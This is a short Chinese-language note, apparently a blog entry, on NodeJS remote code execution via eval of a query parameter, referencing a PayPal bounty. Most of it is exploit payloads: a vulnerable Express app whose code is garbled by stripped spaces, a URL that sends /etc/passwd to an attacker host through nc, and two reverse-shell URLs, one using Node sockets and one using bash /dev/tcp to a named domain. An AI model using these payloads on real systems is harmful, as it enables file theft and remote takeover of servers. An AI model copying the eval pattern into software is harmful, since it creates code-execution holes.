NodeJS远程代码执行
背景
@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。
测试
varexpress=require('express'); varapp=express(); app.get('/',function(req,res){ res.send('Helloeval(req.query.q)); console.log(req.query.q); }); app.listen(8080,function(){ console.log('Examplelisteningonport8080!'); });
任意文件读取
http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
GETSHELL
http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
GETSHELL2
http://host:8080/?q=require("child_process").exec('bash-c"bash-i>%26/dev/tcp/wufeifei.com/78900>%261"')